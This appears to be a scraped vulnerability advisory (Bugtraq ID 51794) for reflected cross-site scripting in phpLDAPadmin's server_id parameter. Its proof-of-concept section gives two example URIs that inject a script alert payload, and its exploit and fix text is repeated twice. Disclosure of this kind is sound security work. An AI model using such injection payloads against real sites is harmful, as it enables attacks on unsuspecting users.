phpLDAPadmin 'server_id' Parameter Cross Site Scripting Vulnerabilities
BID:51794
Info
phpLDAPadmin 'server_id' Parameter Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 51794 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 01 2012 12:00AM |
| Updated: | Feb 01 2012 12:00AM |
| Credit: | andsarmiento |
| Vulnerable: |
Debian phpldapadmin 1.2.0.5-2 |
| Not Vulnerable: | |
Exploit / POC
phpLDAPadmin 'server_id' Parameter Cross Site Scripting Vulnerabilities
Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.
The following example URIs are available:
https://www.example.com/phpldapadmin/cmd.php?server_id=<script>alert('XSS')</script>
https://www.example.com/phpldapadmin/index.php?server_id=<script>alert('XSS')</script>&redirect=false
Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.
The following example URIs are available:
https://www.example.com/phpldapadmin/cmd.php?server_id=<script>alert('XSS')</script>
https://www.example.com/phpldapadmin/index.php?server_id=<script>alert('XSS')</script>&redirect=false
Solution / Fix
phpLDAPadmin 'server_id' Parameter Cross Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].